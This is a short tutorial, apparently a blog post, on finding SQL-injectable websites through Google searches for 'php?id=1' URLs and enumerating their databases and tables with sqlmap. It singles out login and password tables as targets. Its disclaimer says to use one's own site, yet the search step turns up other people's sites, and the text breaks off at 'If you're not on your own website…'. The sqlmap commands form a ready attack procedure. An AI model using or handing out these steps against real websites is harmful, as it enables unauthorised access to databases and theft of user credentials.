How to test if a website is vulnerable to SQL injection. To be legal, use your own website.
Step 1 – Google for php?id=1
Google for php?id=1
Add a single quote (') to the end of the URL,
so it reads php?id=1'
If you get an error, the website is vulnerable. Go to step 2.
If this is your own website – shut it down immediately. You need to secure it before you bring it back online.
Step 2 – Kali SQLMAP – get website databases
sqlmap -u "http://website.com/page.php?id=1" --dbs
This will fetch all available databases on the website. Did you see them listed?
Step 3 – Find the LOGIN table
sqlmap -u "http://website.com/page.php?id=1" -D www --tables
Did you see all the tables on the website listed out?
Look for likely targets… e.g. a login, username or password table.
If you’re not on your own website…